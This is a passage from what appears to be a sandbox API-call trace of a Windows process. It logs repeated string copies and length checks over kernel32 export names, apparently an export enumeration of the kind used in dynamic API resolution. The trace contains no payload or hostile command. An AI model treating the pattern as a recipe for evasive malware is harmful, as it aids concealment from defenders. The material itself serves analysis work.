(lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.633] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.633] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.633] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.633] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.633] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.633] lstrlenA (lpString="CANCELIO") returned 8 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.634] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.634] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.634] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.634] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.634] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.634] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.634] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.634] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.634] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.634] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.634] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.634] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.634] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.634] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.634] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.634] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.634] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.634] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.635] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.635] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.635] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.635] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.635] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.635] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.635] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.635] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.635] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.635] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.635] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.635] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.635] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.635] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.635] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.635] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.635] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.635] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.635] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.636] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.636] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.636] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.636] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.636] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.636] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.636] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.636] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.636] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.636] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.636] lstrlenA (lpString="COPYFILEA") returned 9 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.636] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.636] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.636] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.636] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.636] lstrlenA (lpString="COPYFILEW") returned 9 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.636] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.636] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.637] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.637] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.637] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.637] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.637] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.637] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.637] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.637] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.637] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.637] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.637] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.637] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.637] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.637] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.637] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.637] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.637] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.638] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.638] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.638] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.638] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.638] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.638] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.638] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.638] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.638] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.638] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.638] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.638] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.638] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.638] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.638] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.638] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.638] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.638] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.639] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.639] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.639] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.639] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.639] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.639] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.639] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.639] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.639] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.639] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.639] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.639] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.639] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.639] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.639] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.639] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.639] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.640] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.640] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.640] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.640] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.640] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.640] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.640] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.640] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.640] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.640] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.640] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.640] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.640] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.640] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.640] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.640] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.640] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") 